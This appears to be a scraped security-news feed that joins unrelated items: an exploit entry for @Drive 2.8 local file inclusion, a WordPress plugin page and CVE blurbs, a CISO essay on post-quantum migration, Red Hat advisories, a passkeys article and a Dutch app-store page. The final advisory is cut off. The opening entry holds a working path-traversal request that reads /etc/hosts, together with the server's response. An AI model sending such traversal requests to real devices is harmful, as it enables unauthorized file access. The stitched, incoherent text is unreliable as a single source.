@Drive version 2.8 suffers from a local file inclusion vulnerability.

    # Exploit Title: @Drive 2.8  Local File inclusion# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://evolutive.co/# Software Link: https://apps.apple.com/us/app/drive/id578982909# Version: 2.8# Tested on: iPhone ios 15.6GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.1.187User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept: */*Referer: http://192.168.1.187/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close--------HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: 213Accept-Ranges: bytesDate: Thu, 08 Sep 2022 14:26:16 GMT### Host Database## localhost is used to configure the loopback interface# when the system is booting.  Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1             localhost

@Drive 2.8 Local File Inclusion

Authenticated (subscriber+) Stored Cross-Site Scripting (XSS) vulnerability in Ali Khallad's Contact Form By Mega Forms plugin <= 1.2.4 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

Mega Forms is highly advanced contact form builder for WordPress, it comes with all the contact form features you will ever need, including AJAX submission, multi-page contact forms, secure file uploads, conditional logic, save and continue, and tons more. You can use Mega Forms to save time, grow customer interaction, and build better contact forms for any purpose.

Mega Forms gives you a modern interface, easy customization, and the ability to build modern & professional forms thanks to our intuitive drag & drop visual editor.

Now you can create better forms, embed them anywhere on your WordPress website, get email notification for each submission, perform custom tasks, and collect & manage data without being a coding ninja.

Mega Forms contact forms are also highly optimized for web and server performance. We know how important speed is when it comes to SEO and user experience, that’s why we have built every piece of Mega Forms with performance and usability in mind. Mega Forms will load the least possible amount of CSS & JS assets, and only store necessary data to the database to keep your website fast and provide your users with better experience.

**No Coding Skills Required**

No technical skill? No problem. You can easily design simple and complex forms with our highly advanced visual builder. Mega Forms offers a flexible row/column layout system that requires very minimal effort to build forms that blends nicely with your website design.

**Developer Friendly**

Mega Forms has been built with developers in mind. This means it’s flexible, easily extendable, and full of action and filter hooks, making it easy to customize to your own needs.

**Top Features**

Mega Forms comes with a visual editor and ton of other features:

*   Intuitive user interface
*   Drag & drop form builder
*   Optimized for speed & performance
*   Tons of free field types ( text, select, radio, checkboxes and more )
*   Regular updates & dedicated support
*   Fully responsive & mobile friendly
*   Unlimited forms & form submission
*   Merge tags support
*   Multi-steps support
*   Conditional logic support
*   Export and import forms
*   Customizable templates
*   Full control ( styles, email templates, field templates and more )
*   Developer friendly
*   Highly effective Anti-spam system ( invisible to users )

**Does Mega Forms Have A Getting Started Guide**

We’re currently still working on building Mega Forms site, once completed, it will have a complete list of resources at https://wpmegaforms.com/

**Is There A Documentation For Developers**

We’re currently still working on building Mega Forms site, once completed, it will have a complete list of resources at https://wpmegaforms.com/

**Does It Work On All Devices**

Yes, Mega Forms is completely responsive and will display forms properly on all types of devices.

**Does It Include Spam Protection**

Yes, we are using a combination of Honeypot & Timetrap to make great spambot-proof forms. We have implemented these thwarting techniques in a way that makes them very effective in detecting and blocking spam submissions without annoying the real users.

**Can I Export & Import Forms**

Yes, you can easily export and import forms via the dedicated export/import tool in the admin area.

**What Field Types Does Mega Forms Offer**

Mega Forms comes with all the fields you need:

*   Text Field
*   Paragraph Text (Textarea)
*   Dropdown Field
*   Radio Buttons
*   Checkboxes
*   Number
*   Name
*   Email Address
*   Address
*   Phone
*   Password
*   Date
*   Website
*   Hidden
*   HTML ( HTML code )
*   Divider
*   Question
*   File Upload
*   Consent

Here is a list of the field types in progress:

*   Google ReCaptacha
*   Calculated Field
*   Star Rating
*   Rangle Slider
*   Toggle
*   Signature
*   Pricing ( field group )

Here is a list of the field containers in progress:

*   Repeatable Group
*   Tabs
*   Accordions

**What Actions Does Mega Forms Offer**

Mega Forms comes with the necessary actions by default:

*   Email Notification
*   WordPress Hook

Here is a list of actions in progress:

*   Google Spreadsheet
*   Integrations ( MailChimp, ActiveCampaign, ConvertKit, AWeber, Campaign Monitor…etc )
*   Webhooks
*   Front End Posting
*   Register User

**Is It Translation Ready**

Yes, Mega Forms has full translation and localization support via the ‘megaforms’ textdomain.

**What Features Are Coming Next**

We are in the process of building more features, here is a list:

*   Form Chaining
*   Export Entries into CSV
*   Tons Of Integrations
*   Payments
*   PDF Copy
*   Save And Continue Later
*   Advanced Stats

We don’t promise all of this will be available soon, but we promise we’ll do our best to ship these features as soon as we can.

Mega Forms is a great drag n drop contact form builder. It supports all form fields you need and has a multi-page form option.

This is a very useful plugin for creating simple forms in WordPress. It saves entries in DB which can be very useful. Form builder is simple with easy to understand UI. I hope it will get more features. Ability to export entries in .xlsx and .pdf would be great.

Simple and perfect plugin to create your form

Congratulations, I'm very happy to be the second one to publish a review for this great plugin.

I think it is a useful Plugin and We wait for more Featuresز Due to the WordPress Hook, I think it is good to explain it in your Plugin Page or URL to let the Users Know how to use it.. Best regards

Read all 5 reviews

“Contact Form By Mega Forms – Drag and Drop Form Builder” is open source software. The following people have contributed to this plugin.

Contributors

*    Ali Khallad

**1.0.0**

*   First release

**1.0.1**

*   Fixed bug ( error when saving forms without adding actions )

**1.0.2**

*   Fixed bugs ( Form editior not taking full screen size, admin area styling fixes..etc )
*   Added “Section” field
*   Added “Question” field ( mainly added to help with Spam prevention )
*   Added the possibility to make “Divider” field transparent ( maily to be used as a “spacer” when needed )
*   Corrected some spelling mistakes

**1.0.3**

*   Fixed bugs
*   Added option to disable saving entries on form submission ( usefull for updating user info..etc )
*   Implemented Anti-spam technique ( Honeypot trap )
*   Added shortcode processing feature to the HTML field

**1.0.4**

*   Fixed bugs ( honeypot issues, php errors on empty form submission, choices not saving in order after moving them around…etc )
*   Added Anti-spam technique ( timetrap )

**1.0.5**

*   Fixed bugs
*   Added pre-made forms feature ( you can now create form based on pre-made templates )

**1.0.6**

*   Fixed bugs ( Styling issues, repeated name attributes when using multiple forms on same page )
*   Improvements to the overall user experience
*   Improvements to the form editor design to allow more clarity while building and managing forms
*   Added more flexibility for developers to create fields, field options..etc
*   Added AJAX submission support
*   Added conditional logic

**1.0.7**

*   Improved: order and display of options in the edit field tab ( Form editor )
*   Fixed: duplicate field setting tabs not responding ( Form editor )
*   Fixed: AJAX form doesn’t respond after first submission
*   Fixed: “Maximum call stack size exceeded” JS error when deep conditional logic is implemented
*   Added: multi-step feature ( paged forms )
*   Added: file upload field

**1.0.8**

*   Styling fixes
*   form editor preview fixes ( wrong column width + wrong description position when typed the first time )
*   Fixed: form shortcode was returning as an empty string when called via AJAX
*   Fixed: AJAX validation was adding duplicate notices for choice fields (radios, checkboxes)
*   Fixed: bug in mfget_option function that mixes between false and non-existing setting values causing some of the true/false settings to have unexpected behavior
*   Added: Save and continue feature
*   Added: Consent field

**1.0.9**

*   Extended “One line text” and “Paragraph text” fields so that the user can view number of characters typed if the maximum length is set for these fields.
*   Added the ability to control field label visibility (show/hide)
*   Fixed bug: When duplicating a field in the form editor, the field values were not copied over to the new field
*   Fixed bug: When adding field tag in the form editor, the field preview didn’t update with the new field value because the change event is not triggered for that field

**1.1.0**

*   Fixed: emails were not being sent when there are multiple recipients

**1.1.1**

*   Performance optimization ( combined and minifed CSS & JS resources )
*   Improved conditional logic

**1.1.2**

*   Fix: a JS bug that prevents items from displaying in the single entry page
*   Fix: email header issues
*   Fix: conditional logic not working on compound fields
*   Improvement: Make phone & number fields display a keypad on mobile view instead of the default keyboard.

**1.1.3**

*   Update: include all PRO features in free version and drop the paid version ( Mega Forms with all PRO features is now free ).
*   Fix: a bug in the referrer column in entries table that prevents the creation of entries if the referrer is longer than 100 chars.

**1.1.4**

*   added filter hook “mf\_bypass\_session\_error” to allow bypassing session validation error ( usefull when cookies aren’t allowed/saved ).

**1.1.5**

*   Fix: form email action issues ( subject was empty by default, email not sending when the “from” field is not formatted correctly )
*   Fix: entries list display ( the list was showing all columns/fields by default which can cause unpleasant view for large forms)
*   Fix: fields order was based on ID order on different areas ( emails, entries, entry lists..etc ), this is corrected to show fields in the same order as they appear on the form.
*   Improved the “Change columns visibility” option design/display on the entries list page
*   Ensure that once an entry is deleted, all associated files will be deleted as well.
*   Added a link to download/view uploaded files in email notifications

**1.1.6**

*   Fix: bug in file field description ( removing file field description was not possible )
*   Added WordPress shortcodes support to the “default value” field
*   Fix: syntax error during activation

**1.1.7**

*   Added cookies compatibility with wpengine ( to prevent caching issues )
*   Fixed a bug with WP admin notices ( hiding notices outside the plugin’s pages )
*   Fixed a bug with the plugin’s admin snackbar ( not being loaded on some pages )

**1.1.8**

*   Bug fixes in the drag and drop uploads field ( inaccurate file count … )

**1.1.9**

*   Fix: a bug in “more options” selection in email action that only allows a single value to be saved
*   Fix: a bug making the filetype case-sensitive in upload field

**1.2.0**

*   Fix: a bug in checkbox option that is causing only the last selected value to be saved from a checkbox list in AJAX submissions
*   Fix: a bug in “form save” process that is causing only a single “form action” to be saved.

**1.2.1**

*   Fix: maintain the selected tab selected after page refresh ( admin settings )
*   Added: ability to export form entries

**1.2.2**

*   Changed Mega Forms session cookie prefix from “mf” to “wordpress\_mf” to ensure compatibility with caching plugins and hosting providers caching.
*   Fixed: CSS clearfix incompatibility with some theme which causing the layout of some fields to break ( eg; address field when error are displayed )
*   Fixed: Bug that prevented the “CSS Classes” value from being saved for form fields.

**1.2.3**

*   Styling fixes
*   Reduced resources ( CSS, JS ) size.

**1.2.4**

*   Add support to multisite

**1.2.5**

*   CSS Fixes
*   Fixed a XSS issue. Credit: ptsfence.

CVE-2022-40191: Contact Form By Mega Forms – Drag and Drop Form Builder

Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team wpForo Forum plugin <= 2.0.5 at WordPress.

CVE-2022-38144: wpForo Forum

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in All in One SEO plugin <= 4.2.3.1 at WordPress.

CVE-2022-38093: All in One SEO – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic

You certainly don't need to panic, but you do need to form a plan to prepare for the post-quantum reality.

Unless you live under a rock, you'll know that quantum computers will break the cryptography we use today in as little as 10 years. Unfortunately, most analysis on this topic is simplistic. The quantum threat is described as though a day will come where quantum is unleashed and all systems will be broken at once. This is far from the truth.

As a CISO, it's important to develop a nuanced understanding of this critical topic. You certainly don't need to panic, but you need to form a plan that's based on your business, with all its idiosyncrasies. Your peers in other companies should be doing the same thing; however, their plans will look different. There is no generic answer to the quantum threat.

In reality, the threat will materialize slowly. The first machines able to run Shor's algorithm will take weeks to break an RSA key. Only the highest value targets will be considered for attack, given the immense cost expected for that amount of computation. Over time, more machines will be capable of breaking keys, and the cost and time associated with the task will reduce dramatically. Eventually, anyone will be able to perform this attack within minutes for minimal cost.

Your goal as a CISO is to assess your risk over this unknown time frame. Do you process data so sensitive that you're likely to be among the first targets? Is some of your data more valuable than the rest? What about the lifetime of the data — how long does it need to remain secret? These are all questions to consider as you create a pragmatic plan to address the quantum threat.

**Understand the Status Quo**

At a recent conference, I heard a law firm describe its response to a major cyberattack. During the confusing first days, the company was desperate to assess whether its critical data was safe. Yet the respondents realized they weren't sure what data mattered most. Eventually they concluded their client data was more important than the rest of the business combined. This shaped the firm's subsequent decisions and accelerated its response time.

Ideally, you would reach these conclusions before a major cyberbreach. And certainly, you must understand your business priorities before you plan your post-quantum migration plan. CISOs need to develop an inventory of every system that describes:

*   The business importance of the data.
*   How cryptography protects the data at rest and in transit.
*   How long the data needs to remain secret. 

If you already have this data in hand, congratulations — you're unusually well-prepared. For most CISOs, however, this information is patchy, at best. Understanding the status quo is the critical first step in your migration.

**Pragmatically Prioritize**

Next comes the difficult piece. With your pragmatic hat on, you need to decide the order in which to migrate your systems to post-quantum algorithms. You can't change everything at once, and it's likely to be years between the time your first systems are migrated and the last.

Your highest priority should be long-term sensitive data that is transmitted across the Internet. This includes health data, government secrets, client data, and intellectual property. This data is especially vulnerable thanks to an attack sometimes known as "hack now, decrypt later," in which attackers record encrypted transmissions to decrypt in the future using a quantum computer.

If your company develops physical devices, such as in the Internet of Things (IoT) industry, you will need to pay particular attention to migrating roots of trust toward post-quantum algorithms. Devices that are expected to remain secure for 10 or more years are definitely at risk from fraudulent firmware once the quantum threat arrives.

This is the hardest step in the migration process because it's unique to your business. But it's worth doing correctly so that you allocate resources appropriately. This process also highlights the vendors you need to work closely with, as they migrate their own systems to post-quantum protection.

**Start Testing**

Once your migration plan is in place, the next step is to perform testing to understand the impact of shifting your systems toward post-quantum algorithms. The new post-quantum algorithms behave differently than the algorithms we use today, and it won't always be a simple task to pull one algorithm out and replace it with another.

Even with the recent NIST announcement of its initial quantum-resistant algorithm candidates, post-quantum algorithms are not yet standardized, and it may take until 2024 until that happens. Use this time wisely to understand where you need to invest additional resources to cope with the changes that lie ahead.

**Take the Chance to Build Better**

Whenever I talk about quantum, I find the conversation quickly drifts to the quantum threat. However, I encourage people to think positively about quantum technology and even the quantum threat itself.

Responding to the threat will require an immense upheaval of systems, similar in scope to the Y2K challenge. This is a rare opportunity to touch each of our systems and change them for the better. It's certain that this algorithm migration won't be the last one we have to conduct. Let's use this opportunity to build crypto agility into our systems, so the next migration is far less painful.

And while we are rebuilding crypto systems, we should explore how we can build on firmer foundations. This is where quantum technology has a role to play. As we look to a future where threat actors have quantum computers as a weapon, we should look to defend ourselves with the same amount of power. Quantum is a dual-edged sword, and we should ensure that, as defenders, we are ready to wield it for protection as well.

A Pragmatic Response to the Quantum Threat

Red Hat Security Advisory 2022-6385-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openvswitch2.15 security update  
Advisory ID:       RHSA-2022:6385-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6385  
Issue date:        2022-09-07  
CVE Names:         CVE-2022-2132  
====================================================================  
1. Summary:

An update for openvswitch2.15 is now available for Fast Datapath for Red  
Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* dpdk: DoS when a Vhost header crosses more than two descriptors and  
exhausts all mbufs (CVE-2022-2132)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2099475 - CVE-2022-2132 dpdk: DoS when a Vhost header crosses more than two descriptors and exhausts all mbufs

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch2.15-2.15.0-113.2.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch2.15-2.15.0-113.2.el8fdp.aarch64.rpm  
openvswitch2.15-2.15.0-113.2.el8fdp.aarch64.rpm  
openvswitch2.15-debuginfo-2.15.0-113.2.el8fdp.aarch64.rpm  
openvswitch2.15-debugsource-2.15.0-113.2.el8fdp.aarch64.rpm  
openvswitch2.15-devel-2.15.0-113.2.el8fdp.aarch64.rpm  
openvswitch2.15-ipsec-2.15.0-113.2.el8fdp.aarch64.rpm  
python3-openvswitch2.15-2.15.0-113.2.el8fdp.aarch64.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-113.2.el8fdp.aarch64.rpm

noarch:  
openvswitch2.15-test-2.15.0-113.2.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch2.15-2.15.0-113.2.el8fdp.ppc64le.rpm  
openvswitch2.15-2.15.0-113.2.el8fdp.ppc64le.rpm  
openvswitch2.15-debuginfo-2.15.0-113.2.el8fdp.ppc64le.rpm  
openvswitch2.15-debugsource-2.15.0-113.2.el8fdp.ppc64le.rpm  
openvswitch2.15-devel-2.15.0-113.2.el8fdp.ppc64le.rpm  
openvswitch2.15-ipsec-2.15.0-113.2.el8fdp.ppc64le.rpm  
python3-openvswitch2.15-2.15.0-113.2.el8fdp.ppc64le.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-113.2.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch2.15-2.15.0-113.2.el8fdp.s390x.rpm  
openvswitch2.15-2.15.0-113.2.el8fdp.s390x.rpm  
openvswitch2.15-debuginfo-2.15.0-113.2.el8fdp.s390x.rpm  
openvswitch2.15-debugsource-2.15.0-113.2.el8fdp.s390x.rpm  
openvswitch2.15-devel-2.15.0-113.2.el8fdp.s390x.rpm  
openvswitch2.15-ipsec-2.15.0-113.2.el8fdp.s390x.rpm  
python3-openvswitch2.15-2.15.0-113.2.el8fdp.s390x.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-113.2.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch2.15-2.15.0-113.2.el8fdp.x86_64.rpm  
openvswitch2.15-2.15.0-113.2.el8fdp.x86_64.rpm  
openvswitch2.15-debuginfo-2.15.0-113.2.el8fdp.x86_64.rpm  
openvswitch2.15-debugsource-2.15.0-113.2.el8fdp.x86_64.rpm  
openvswitch2.15-devel-2.15.0-113.2.el8fdp.x86_64.rpm  
openvswitch2.15-ipsec-2.15.0-113.2.el8fdp.x86_64.rpm  
python3-openvswitch2.15-2.15.0-113.2.el8fdp.x86_64.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-113.2.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2132  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYxkbAtzjgjWX9erEAQiGZw/+K+d85L4msMO7cqcoX4NrRlkW/Ul6Fkx/  
iXHMH6nyv6CCFFydhm2MKR56A5fMVK8LDPjlWLLd9KKq1ej4QpKzX0VBkcBvfVKL  
LDU9SzDLeGvzJsLXEFhAWR3su4/RS4CoTHUQXw28ktcvnuG+91rKZoVbS/FwGc5o  
pXaNwJK87FnU+7EctPSk13uzGaX4pQMf6CCvddd192VuSDt7QaA3qIHw5SgytElz  
GoxSoLCelL8YHhrwxIOSO25VkTjhiKyZ18PN3BAHoNb+/115j4uTN+nWKIOqP8Uh  
0rkVEZ/JaWNZC8EbAs4eGgtfGJZaBAgkn/V7QDi/kiAeb2aLPWse7flwBCmU8eKJ  
Vtfd2CrLpGkmDaZRlaHoUH7TFZ01lExTADGs67aqFOu3vG/3ISLutnOL8iNgQ/v0  
ioGPEKEUMN5MdbejYieXx7B6KbVCYl4OqZh43Mn+hgLiVCZMswnYslS3msKUpSdF  
qIfqvNbsbehATTP7AgDVFJ+usF53Ibd8E5ydT1KhfCiPbiY2iHnvXzLsgK0xr7hT  
sK/srMkfJA727bxTlnJqEtqEzEdnGp9UNxnNwobjkoqeKBljNehExDLwWscGvHH/  
+7UCxcjoiL6ld4aJA08NJKrvca7Qrf5qD4ODLBma9+lS33uFEoQgqWNU7Wt3X/Uu  
Mah3I2oolgM=3xc9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6385-01

Nagios XI before v5.8.7 was discovered to contain a cross-site scripting (XSS) vulnerability via the ajax.php script in CCM 3.1.5.

CVE-2022-38254: Nagios XI Change Log - Nagios

With iOS 16 and macOS Ventura, Apple is introducing passkeys—a more convenient and secure alternative to passwords.

For years, we’ve been promised the end of password-based logins. Now the reality of a passwordless future is taking a big leap forward, with the ability to ditch passwords being rolled out for millions of people. When Apple launches iOS 16 on September 12 and macOS Ventura next month, the software will include its password replacement, known as passkeys, for iPhones, iPads, and Macs.

Passkeys allow you to log in to apps and websites, or create new accounts, without having to create, memorize, or store a password. This passkey, which is made up of a cryptographic key pair, replaces your traditional password and is synced across iCloud’s Keychain. It has the potential to eliminate passwords and improve your online security, replacing the insecure passwords and bad habits you probably have now.

Apple’s rollout of passkeys is one of the largest implementations of password-free technology to date and builds on years of work by the FIDO Alliance, an industry group made up of tech’s biggest companies. Apple’s passkeys are its version of the standards created by the FIDO Alliance, meaning they will eventually work with Google, Microsoft, Meta, and Amazon’s systems.

What Is a Passkey?

Using a passkey is similar to using a password. On Apple’s devices, it’s built into the traditional password boxes that websites and apps use to get you to log in. Passkeys act as a unique digital key and can be created for each app or website you use. (The word “passkey” is also being used by Google and Microsoft, with FIDO calling them “multi-device FIDO credentials.”)

If you are new to an app or a website, there’s the potential that you can create a passkey instead of a password from the start. But for services where you already have an account, it’s likely you will need to log in to that existing account using your password and then create a passkey.

Apple’s demonstrations of the technology show a prompt appearing on your devices during the sign-in or account-creation phase. This box will ask whether you would like to “save a passkey” for the account you are using. At this stage, your device will prompt you to use Face ID, Touch ID, or another authentication method to create the passkey.

Once created, the passkey can be stored in iCloud’s Keychain and synced across multiple devices—meaning your passkeys will be available on your iPad and MacBook without any extra work. Passkeys work in Apple’s Safari web browser as well as on its devices. They can also be shared with nearby Apple devices using AirDrop.

As Apple’s passkeys are based on the wider passwordless standards created by the FIDO Alliance, there’s the potential that they can be stored elsewhere, too. For instance, password manager Dashlane has already announced its support for passkeys, claiming it is an “independent and universal solution agnostic of the device or platform.”

While Apple is launching passkeys with iOS 16 and macOS Ventura, there are several caveats to its rollout. First, you need to update your devices to the new operating system. Second is that apps and websites need to support the use of passkeys—they can do this by using the FIDO standards. Ahead of Apple’s updates, it isn’t clear which apps or websites are already supporting passkeys, although Apple first previewed the technology to developers at its developer conference in 2021.

How Do Apple’s Passkeys Work?

Under the hood, Apple’s passkeys are based on the Web Authentication API (WebAuthn), which was developed by the FIDO Alliance and World Wide Web Consortium (WC3). The passkeys themselves use public key cryptography to protect your accounts. As a result, a passkey isn’t something that can (easily) be typed.

When you create a passkey, a pair of related digital keys are created by your system. “These keys are generated by your devices, securely and uniquely, for every account,” Garrett Davidson, an engineer on Apple’s authentication experience team, said in a video about passkeys. One of these keys is public and stored on Apple’s servers, while the other key is a secret key and stays on your device at all times. “The server never learns what your private key is, and your devices keep it safe,” Davidson said.

Apple’s Killing the Password. Here’s Everything You Need to Know

WeDayCare B.V Ouderapp before v1.1.22 allows attackers to alter the ID value within intercepted calls to gain access to data of other parents and children.

Met de ‘Eigen & Wijzer ouderapp’ kijkt u mee met de belevenissen van uw kind(eren) bij Eigen&Wijzer Kinderopvang. U kunt foto’s bekijken, berichten van de groep en de locatie lezen en versturen en de ontwikkelingen van uw kind(eren) volgen. Het is via de app mogelijk om opvangdagen aan te vragen, te ruilen en de afwezigheid door te geven. U kunt tevens de facturen, jaaropgaven en andere documenten inzien.

Om gebruik te maken van deze App moet je kinderdagverblijf organisatie aangesloten zijn bij Wedaycare.com.

**Nieuw**

Met de WeDayCare App staan ouders direct in contact met het kinderdagverblijf. Blijf dagelijks op de hoogte van alle leuke momenten tijdens de dag op de opvang. Met de app kun je foto’s bekijken, dagelijks schriftje inzien en berichten sturen met de medewerkers van de groep. Daarnaast kun je ook extra opvang of ruildagen aanvragen en afwezigheid doorgeven.

Om gebruik te maken van deze App moet je kinderdagverblijf organisatie aangesloten zijn bij Wedaycare.com.

**Beoordelingen en recensies**

2,8 van 5

9 beoordelingen

**Prima app, kleine bug**

> Prima handige app. Snel communicatie met opvang, vrije dagen aanvraag etc werkt goed. Alleen bij reactie dat er nieuwe invoer in het dagboek is moet je 2x het dagboek openen voordat het bericht geladen wordt

**Verschrikkelijk app**

> Kan geen eens foto download en heb een iPhone 13 pro Max. Niet in de berichten of in het fotoalbum. Dat is het enige waarom ik de app heb. Zou 0 sterren geven als dat kon.

> Beste Nore,
> 
> Waarschijnlijk heb je geen toestemming gegeven dat de app foto's kan downloaden op je telefoon. Zou je anders de app willen verwijderen en opnieuw willen installeren? Hierna krijg je de vraag zodra je de eerste foto download om toestemming te geven voor het downloaden van foto's. We horen graag of het gelukt is. Zou je ons willen mailen op support@wedaycare.com. Bedankt

**Werkt super!**

> Erg fijn om zo op de hoogte gehouden te worden. App werkt goed!

> Fijn om te horen. Mocht je nog suggesties hebben horen wij het graag via support@wedaycare.com

**App-privacy**

De ontwikkelaar, Wedaycare B.V., heeft aangegeven dat volgens de toepassing van het privacybeleid van de app gegevens kunnen worden beheerd zoals hieronder staat beschreven. Ga voor meer informatie naar het privacybeleid van de ontwikkelaar.

**Er worden geen gegevens verzameld**

De ontwikkelaar verzamelt geen gegevens van deze app.

Toepassing van het privacybeleid kan variëren op basis van bijvoorbeeld de functies die je gebruikt of je leeftijd. Lees meer

**Informatie**

Provider

Wedaycare B.V.

Grootte

34,5 MB

Categorie

Onderwijs

Compatibiliteit

iPhone

Vereist iOS 12.0 of nieuwer.

iPad

Vereist iPadOS 12.0 of nieuwer.

iPod touch

Vereist iOS 12.0 of nieuwer.

Mac

Vereist een Mac met macOS 11.0 of nieuwer én Apple M1-chip of nieuwer.

Leeftijd

4+

Copyright

© WeDayCare

Prijs

Gratis

*   App-support
*   Privacybeleid

*   App-support
*   Privacybeleid

**Meer van deze ontwikkelaar**

**Suggesties voor jou**

CVE-2022-36539: ‎Eigen&Wijzer Ouderapp

Red Hat Security Advisory 2022-6370-01 - Red Hat Advanced Cluster Management for Kubernetes 2.6.0 images Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix security issues and several bugs. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat Advanced Cluster Management 2.6.0 security updates and bug fixes  
Advisory ID:       RHSA-2022:6370-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6370  
Issue date:        2022-09-06  
CVE Names:         CVE-2022-1012 CVE-2022-1292 CVE-2022-1586   
                   CVE-2022-1705 CVE-2022-1785 CVE-2022-1897   
                   CVE-2022-1927 CVE-2022-1962 CVE-2022-2068   
                   CVE-2022-2097 CVE-2022-2526 CVE-2022-28131   
                   CVE-2022-29154 CVE-2022-30629 CVE-2022-30630   
                   CVE-2022-30631 CVE-2022-30632 CVE-2022-30633   
                   CVE-2022-30635 CVE-2022-31129 CVE-2022-32148   
                   CVE-2022-32206 CVE-2022-32208 CVE-2022-32250   
=====================================================================

1. Summary:

Red Hat Advanced Cluster Management for Kubernetes 2.6.0 General  
Availability release images, which fix security issues and bugs.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.6.0 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix security issues and several bugs. See  
the following Release Notes documentation, which will be updated shortly  
for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/

Security fixes: 

* CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS

* CVE-2022-30629 golang: crypto/tls: session tickets lack random  
ticket_age_add

* CVE-2022-1705 golang: net/http: improper sanitization of  
Transfer-Encoding header

* CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions

* CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip

* CVE-2022-30630 golang: io/fs: stack exhaustion in Glob

* CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

* CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob

* CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal

* CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode

* CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy -  
omit X-Forwarded-For not working

Bug fixes:

* assisted-service repo pin-latest.py script should allow custom tags to be  
pinned (BZ# 2065661)

* assisted-service-build image is too big in size (BZ# 2066059)

* assisted-service pin-latest.py script should exclude the postgres image  
(BZ# 2076901)

* PXE artifacts need to be served via HTTP (BZ# 2078531)

* Implementing new service-agent protocol on agent side (BZ# 2081281)

* RHACM 2.6.0 images (BZ# 2090906)

* Assisted service POD keeps crashing after a bare metal host is created  
(BZ# 2093503)

* Assisted service triggers the worker nodes re-provisioning on the hub  
cluster when the converged flow is enabled (BZ# 2096106)

* Fix assisted CI jobs that fail for cluster-info readiness (BZ# 2097696)

* Nodes are required to have installation disks of at least 120GB instead  
of at minimum of 100GB (BZ# 2099277)

* The pre-selected search keyword is not readable (BZ# 2107736)

* The value of label expressions in the new placement for policy and  
policysets cannot be shown real-time from UI (BZ# 2111843)

3. Solution:

For Red Hat Advanced Cluster Management for Kubernetes, see the following  
documentation, which will be updated shortly for this release, for  
important  
instructions on installing this release:

